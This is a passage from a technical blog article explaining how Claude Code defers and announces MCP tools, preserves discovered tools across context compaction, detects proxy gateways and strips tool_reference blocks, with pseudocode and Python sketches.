    &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Note&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;a&lt;/span&gt; &lt;span class="nx"&gt;tool&lt;/span&gt; &lt;span class="nx"&gt;that&lt;/span&gt; &lt;span class="nx"&gt;was&lt;/span&gt; &lt;span class="nx"&gt;deferred&lt;/span&gt; &lt;span class="nx"&gt;but&lt;/span&gt; &lt;span class="nx"&gt;is&lt;/span&gt; &lt;span class="nx"&gt;now&lt;/span&gt; &lt;span class="nf"&gt;loaded &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;undeferred&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="nx"&gt;is&lt;/span&gt; &lt;span class="nx"&gt;NOT&lt;/span&gt;
    &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;reported&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="nx"&gt;removed&lt;/span&gt; &lt;span class="err"&gt;—&lt;/span&gt; &lt;span class="nx"&gt;it&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;s still available, just loaded differently

    if no changes: return null
    return { addedNames, removedNames }
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The delta approach has a critical advantage: it doesn't bust the prompt cache. The pre-message approach changes the first message whenever the tool pool changes (MCP server connects late, tools added/removed), which invalidates the cached prefix. Deltas are appended as attachment messages, leaving the prefix stable.&lt;/p&gt;
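&lt;p&gt;A minimal Python sketch of this delta computation (a hypothetical reimplementation; the message shapes and field names are illustrative, not Claude Code's actual internals):&lt;/p&gt;

```python
def deferred_tools_delta(deferred_names, base_names, pool_names, history):
    # Replay prior announcements to reconstruct what the model has
    # already been told about.
    announced = set()
    for msg in history:
        if msg.get("type") == "deferred_tools_delta":
            announced.update(msg.get("added", []))
            announced.difference_update(msg.get("removed", []))

    added = sorted(set(deferred_names) - announced)
    removed = sorted(n for n in announced
                     if n not in pool_names and n not in base_names)

    # No changes: emit nothing, so the appended messages (and the cached
    # prompt prefix before them) stay byte-stable.
    if not added and not removed:
        return None
    return {"added": added, "removed": removed}
```

&lt;p&gt;Because each delta is appended as a fresh attachment message instead of rewriting the first message, pool changes never touch the cached prefix.&lt;/p&gt;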




&lt;h2&gt;
  
  
  Surviving Compaction
&lt;/h2&gt;

&lt;p&gt;Context compaction summarizes old messages to free space. But compaction destroys &lt;code&gt;tool_reference&lt;/code&gt; blocks — the summary is plain text, not structured content. If the system can't find tool references after compaction, it thinks no tools have been discovered, and every deferred tool disappears from subsequent requests.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Snapshot Mechanism
&lt;/h3&gt;

&lt;p&gt;Before compaction runs, the system takes a snapshot of all discovered tools and stores it on the compact boundary marker:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;compact&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;messages&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Snapshot&lt;/span&gt; &lt;span class="nx"&gt;BEFORE&lt;/span&gt; &lt;span class="nx"&gt;summarizing&lt;/span&gt;
    &lt;span class="nx"&gt;discoveredTools&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;extractDiscoveredToolNames&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;messages&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="nx"&gt;summary&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;summarize&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;messages&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="nx"&gt;boundaryMarker&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;createBoundaryMessage&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;summary&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;discoveredTools&lt;/span&gt; &lt;span class="nx"&gt;is&lt;/span&gt; &lt;span class="nx"&gt;not&lt;/span&gt; &lt;span class="nx"&gt;empty&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="nx"&gt;boundaryMarker&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;metadata&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;preCompactDiscoveredTools&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt;
            &lt;span class="nf"&gt;sorted&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;discoveredTools&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;boundaryMarker&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;...&lt;/span&gt;&lt;span class="nx"&gt;remainingMessages&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The snapshot is taken in all three compaction paths: full compaction, partial compaction (which keeps recent messages intact), and session-memory compaction.&lt;/p&gt;

&lt;p&gt;After compaction, when &lt;code&gt;extractDiscoveredToolNames&lt;/code&gt; scans the messages, it encounters the compact boundary marker first and reads the snapshot:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="err"&gt;#&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Post-compaction&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;message&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;array:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="err"&gt;compact_boundary&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="err"&gt;metadata.preCompactDiscoveredTools:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"mcp__github__create_issue"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;...&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="err"&gt;...&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;remaining&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;messages&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;with&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;tool_reference&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;blocks&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;...&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The scan merges the snapshot with any new references in remaining messages. The union is the full discovered set — nothing is lost.&lt;/p&gt;
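&lt;p&gt;The merge can be sketched in Python as a single pass that unions both sources (field names follow the article's examples; the rest is an illustrative assumption):&lt;/p&gt;

```python
def extract_discovered_tool_names(messages):
    # Union of the compact-boundary snapshot and any tool_reference
    # blocks that survived in the remaining messages.
    discovered = set()
    for msg in messages:
        if msg.get("type") == "compact_boundary":
            meta = msg.get("metadata", {})
            discovered.update(meta.get("preCompactDiscoveredTools", []))
        for block in msg.get("content", []):
            if block.get("type") == "tool_reference":
                discovered.add(block["name"])
    return discovered
```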

&lt;h3&gt;
  
  
  Why This Works
&lt;/h3&gt;

&lt;p&gt;The snapshot is cumulative. Each compaction captures the accumulated set. If compaction A captures tools {X, Y} and the model later discovers Z, compaction B captures {X, Y, Z}. The set only grows.&lt;/p&gt;

&lt;p&gt;Partial compaction scans all messages, not just the ones being summarized. This is deliberate — it's simpler than tracking which tools were referenced in which half, and set union is idempotent, so double-counting is harmless.&lt;/p&gt;




&lt;h2&gt;
  
  
  Edge Cases and Fail-Closed Design
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Model Support
&lt;/h3&gt;

&lt;p&gt;Not every model supports &lt;code&gt;tool_reference&lt;/code&gt; content blocks. The system uses a negative list: models are assumed to support tool search &lt;strong&gt;unless&lt;/strong&gt; they match a pattern in the unsupported list.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="nx"&gt;UNSUPPORTED_MODEL_PATTERNS&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;haiku&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;

&lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;modelSupportsToolReference&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;model&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="nx"&gt;normalized&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;lowercase&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;model&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="nx"&gt;pattern&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="nx"&gt;UNSUPPORTED_MODEL_PATTERNS&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;pattern&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="nx"&gt;normalized&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;   &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nx"&gt;models&lt;/span&gt; &lt;span class="nx"&gt;work&lt;/span&gt; &lt;span class="nx"&gt;by&lt;/span&gt; &lt;span class="k"&gt;default&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is a deliberate design choice. A positive list (allowlist) would require code changes for every new model. The negative list means new models inherit tool search support automatically. Only models known to lack the capability are excluded.&lt;/p&gt;
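&lt;p&gt;As runnable Python, the whole check reduces to a substring scan over a block list (the single &lt;code&gt;haiku&lt;/code&gt; pattern is from the pseudocode above; everything else is a sketch):&lt;/p&gt;

```python
UNSUPPORTED_MODEL_PATTERNS = ["haiku"]  # negative list: block, don't allow

def model_supports_tool_reference(model):
    normalized = model.lower()
    # Substring match, so "claude-haiku-4-5" and "haiku-latest" both hit.
    return not any(p in normalized for p in UNSUPPORTED_MODEL_PATTERNS)
```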

&lt;p&gt;The unsupported pattern list can be updated remotely via feature flags, without shipping a new release. This handles the case where a new model launches without &lt;code&gt;tool_reference&lt;/code&gt; support — the team adds it to the list, and all running instances pick it up.&lt;/p&gt;

&lt;h3&gt;
  
  
  Proxy Gateway Detection: A Two-Act Failure
&lt;/h3&gt;

&lt;p&gt;This is a case where a real-world failure, a fix, and a failure of the fix shaped the final design.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Act 1&lt;/strong&gt;: Users routing API calls through third-party proxy gateways (LiteLLM, corporate firewalls) started getting API 400 errors: &lt;code&gt;"Messages content type tool_reference not supported."&lt;/code&gt; The proxy only accepted standard content types — &lt;code&gt;text&lt;/code&gt;, &lt;code&gt;image&lt;/code&gt;, &lt;code&gt;tool_use&lt;/code&gt;, &lt;code&gt;tool_result&lt;/code&gt; — and rejected the beta &lt;code&gt;tool_reference&lt;/code&gt; blocks. Tool search worked fine with direct Anthropic API calls but broke through any intermediary.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Act 2&lt;/strong&gt;: The fix was aggressive: detect non-Anthropic base URLs and disable tool search entirely. This stopped the 400 errors but created a new problem — users with &lt;em&gt;compatible&lt;/em&gt; proxies (LiteLLM passthrough mode, Cloudflare AI Gateway) lost deferred tool loading. All their MCP tools loaded into the main context window every turn. For users with many MCP tools, this was a significant regression in context efficiency.&lt;/p&gt;

&lt;p&gt;The final design balances both failures:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;isToolSearchEnabledOptimistic&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;mode&lt;/span&gt; &lt;span class="nx"&gt;is&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;standard&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;

    &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nb"&gt;Proxy&lt;/span&gt; &lt;span class="nx"&gt;detection&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;first&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="nx"&gt;party&lt;/span&gt; &lt;span class="nx"&gt;provider&lt;/span&gt; &lt;span class="nx"&gt;but&lt;/span&gt; &lt;span class="nx"&gt;non&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="nx"&gt;Anthropic&lt;/span&gt; &lt;span class="nx"&gt;URL&lt;/span&gt;
    &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;Only&lt;/span&gt; &lt;span class="nx"&gt;triggers&lt;/span&gt; &lt;span class="nx"&gt;when&lt;/span&gt; &lt;span class="nx"&gt;ENABLE_TOOL_SEARCH&lt;/span&gt; &lt;span class="nx"&gt;is&lt;/span&gt; &lt;span class="nf"&gt;unset &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;default&lt;/span&gt; &lt;span class="nx"&gt;behavior&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;ENABLE_TOOL_SEARCH&lt;/span&gt; &lt;span class="nx"&gt;is&lt;/span&gt; &lt;span class="nx"&gt;not&lt;/span&gt; &lt;span class="kd"&gt;set&lt;/span&gt;
       &lt;span class="nx"&gt;AND&lt;/span&gt; &lt;span class="nx"&gt;provider&lt;/span&gt; &lt;span class="nx"&gt;is&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;firstParty&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;
       &lt;span class="nx"&gt;AND&lt;/span&gt; &lt;span class="nx"&gt;baseURL&lt;/span&gt; &lt;span class="nx"&gt;is&lt;/span&gt; &lt;span class="nx"&gt;not&lt;/span&gt; &lt;span class="nx"&gt;a&lt;/span&gt; &lt;span class="nx"&gt;known&lt;/span&gt; &lt;span class="nx"&gt;Anthropic&lt;/span&gt; &lt;span class="nx"&gt;host&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;   &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;proxy&lt;/span&gt; &lt;span class="nx"&gt;would&lt;/span&gt; &lt;span class="nx"&gt;reject&lt;/span&gt; &lt;span class="nx"&gt;tool_reference&lt;/span&gt; &lt;span class="nx"&gt;blocks&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The key insight is the &lt;code&gt;ENABLE_TOOL_SEARCH is not set&lt;/code&gt; condition. When the environment variable is unset, the system assumes unknown proxies can't handle beta features. But setting &lt;em&gt;any&lt;/em&gt; non-empty value — &lt;code&gt;true&lt;/code&gt;, &lt;code&gt;auto&lt;/code&gt;, &lt;code&gt;auto:10&lt;/code&gt; — tells the system "I know what I'm doing, my proxy supports this." The user takes explicit responsibility for their proxy's capabilities.&lt;/p&gt;
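&lt;p&gt;The decision can be sketched like this (the host list and provider value are illustrative placeholders; the real check covers more endpoints):&lt;/p&gt;

```python
import os

# Hypothetical host list; the production check recognizes more hosts.
ANTHROPIC_HOSTS = {"api.anthropic.com"}

def tool_search_allowed(provider, base_host, env=None):
    env = os.environ if env is None else env
    # Any non-empty value is an explicit opt-in: the user asserts their
    # proxy forwards tool_reference blocks untouched.
    if env.get("ENABLE_TOOL_SEARCH"):
        return True
    # Unset: assume an unknown intermediary rejects beta content types.
    if provider == "firstParty" and base_host not in ANTHROPIC_HOSTS:
        return False
    return True
```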

&lt;p&gt;There's also a global kill switch: &lt;code&gt;DISABLE_EXPERIMENTAL_BETAS&lt;/code&gt; forces standard mode regardless of other settings. When this is set, the system strips beta-specific fields from tool schemas before sending them to the API, ensuring no &lt;code&gt;defer_loading&lt;/code&gt; or &lt;code&gt;tool_reference&lt;/code&gt; reaches the wire. This was itself motivated by a separate failure: the kill switch originally didn't remove all beta headers, breaking LiteLLM-to-Bedrock proxies that rejected unknown beta flags.&lt;/p&gt;
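&lt;p&gt;The stripping pass itself is simple; a sketch, assuming tool schemas are plain dicts (only &lt;code&gt;defer_loading&lt;/code&gt; is named in the article, so the field tuple is otherwise an assumption):&lt;/p&gt;

```python
BETA_TOOL_FIELDS = ("defer_loading",)

def strip_beta_fields(tool_schemas):
    # Drop beta-only keys so strictly validating proxies (e.g. a
    # LiteLLM-to-Bedrock hop) never see experimental fields.
    return [{k: v for k, v in schema.items() if k not in BETA_TOOL_FIELDS}
            for schema in tool_schemas]
```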

&lt;h3&gt;
  
  
  Pending MCP Servers
&lt;/h3&gt;

&lt;p&gt;MCP servers connect asynchronously. When a user starts Claude Code, some servers may still be initializing. If tool search is enabled but no deferred tools exist yet (because no servers have connected), the system normally disables tool search for that request — there's nothing to search.&lt;/p&gt;

&lt;p&gt;But if MCP servers are pending, it keeps ToolSearch available:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;useToolSearch&lt;/span&gt; &lt;span class="nx"&gt;AND&lt;/span&gt; &lt;span class="nx"&gt;no&lt;/span&gt; &lt;span class="nx"&gt;deferred&lt;/span&gt; &lt;span class="nx"&gt;tools&lt;/span&gt; &lt;span class="nx"&gt;AND&lt;/span&gt; &lt;span class="nx"&gt;no&lt;/span&gt; &lt;span class="nx"&gt;pending&lt;/span&gt; &lt;span class="nx"&gt;MCP&lt;/span&gt; &lt;span class="nx"&gt;servers&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="nx"&gt;useToolSearch&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;   &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;nothing&lt;/span&gt; &lt;span class="nx"&gt;to&lt;/span&gt; &lt;span class="nx"&gt;search&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;save&lt;/span&gt; &lt;span class="nx"&gt;a&lt;/span&gt; &lt;span class="nx"&gt;tool&lt;/span&gt; &lt;span class="nx"&gt;slot&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;useToolSearch&lt;/span&gt; &lt;span class="nx"&gt;AND&lt;/span&gt; &lt;span class="nx"&gt;no&lt;/span&gt; &lt;span class="nx"&gt;deferred&lt;/span&gt; &lt;span class="nx"&gt;tools&lt;/span&gt; &lt;span class="nx"&gt;AND&lt;/span&gt; &lt;span class="nx"&gt;pending&lt;/span&gt; &lt;span class="nx"&gt;MCP&lt;/span&gt; &lt;span class="nx"&gt;servers&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;keep&lt;/span&gt; &lt;span class="nx"&gt;ToolSearch&lt;/span&gt; &lt;span class="err"&gt;—&lt;/span&gt; &lt;span class="nx"&gt;tools&lt;/span&gt; &lt;span class="nx"&gt;will&lt;/span&gt; &lt;span class="nx"&gt;appear&lt;/span&gt; &lt;span class="nx"&gt;when&lt;/span&gt; &lt;span class="nx"&gt;servers&lt;/span&gt; &lt;span class="nx"&gt;connect&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;When the model calls ToolSearch and no tools match, the result includes the names of pending servers:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="err"&gt;matches:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[],&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="err"&gt;total_deferred_tools:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="err"&gt;pending_mcp_servers:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"github"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"slack"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This tells the model "your search found nothing, but these servers are still connecting — try again shortly."&lt;/p&gt;

&lt;h3&gt;
  
  
  Cache Invalidation
&lt;/h3&gt;

&lt;p&gt;Tool descriptions are memoized to avoid recomputing them on every search. But the deferred tool set can change mid-conversation (MCP server connects, tools added/removed). The cache key is the sorted, comma-joined list of deferred tool names. When the set changes, the cache clears:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;maybeInvalidateCache&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;deferredTools&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="nx"&gt;currentKey&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;sorted&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;tool&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;name&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="nx"&gt;tool&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="nx"&gt;deferredTools&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nf"&gt;join&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;,&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;currentKey&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="nx"&gt;cachedKey&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="nf"&gt;clearDescriptionCache&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="nx"&gt;cachedKey&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;currentKey&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The token count is also memoized with the same key scheme. This means connecting a new MCP server triggers one fresh token count and one fresh description computation, then subsequent searches reuse the cache.&lt;/p&gt;
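&lt;p&gt;A small Python sketch of this key-based memoization pattern (class and field names are invented for illustration):&lt;/p&gt;

```python
class DescriptionCache:
    # Memoizes one computation per tool-set "shape". The key is the
    # sorted, comma-joined name list, as described above.
    def __init__(self):
        self.key = None
        self.value = None

    def get(self, deferred_tools, compute):
        current_key = ",".join(sorted(t["name"] for t in deferred_tools))
        if current_key != self.key:
            self.key = current_key
            self.value = compute(deferred_tools)  # recompute once per change
        return self.value
```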

&lt;h3&gt;
  
  
  Tool Search Disabled Mid-Conversation
&lt;/h3&gt;

&lt;p&gt;If the session switches from a supported model (Sonnet) to an unsupported one (Haiku) mid-conversation, the message history may contain &lt;code&gt;tool_reference&lt;/code&gt; blocks that the new model can't process. The system handles this by stripping tool-search artifacts:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;not&lt;/span&gt; &lt;span class="nx"&gt;useToolSearch&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="nx"&gt;message&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="nx"&gt;apiMessages&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;message&lt;/span&gt; &lt;span class="nx"&gt;is&lt;/span&gt; &lt;span class="nx"&gt;user&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="nf"&gt;stripToolReferenceBlocks&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;message&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nx"&gt;message&lt;/span&gt; &lt;span class="nx"&gt;is&lt;/span&gt; &lt;span class="nx"&gt;assistant&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="nf"&gt;stripCallerField&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;message&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;   &lt;span class="err"&gt;#&lt;/span&gt; &lt;span class="nx"&gt;tool_use&lt;/span&gt; &lt;span class="nx"&gt;caller&lt;/span&gt; &lt;span class="nx"&gt;metadata&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This ensures the API never receives &lt;code&gt;tool_reference&lt;/code&gt; blocks when the current model doesn't support them, even if a previous model generated them.&lt;/p&gt;

&lt;p&gt;There's an additional stripping path for a subtler failure: MCP server disconnection. If a server disconnects mid-conversation, previously valid &lt;code&gt;tool_reference&lt;/code&gt; blocks now point to tools that don't exist in the current pool. The API rejects these with "Tool reference not found in available tools." The normalization pipeline strips &lt;code&gt;tool_reference&lt;/code&gt; blocks for tools that aren't in the current available set, even when tool search is otherwise enabled.&lt;/p&gt;
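&lt;p&gt;This second pass can be sketched as a filter over user-message content (message shapes here are illustrative, not the actual wire format):&lt;/p&gt;

```python
def strip_dangling_references(messages, available_names):
    # Keep a tool_reference only if its target still exists in the pool;
    # everything else (text, tool_result, ...) passes through untouched.
    for msg in messages:
        if msg.get("role") == "user":
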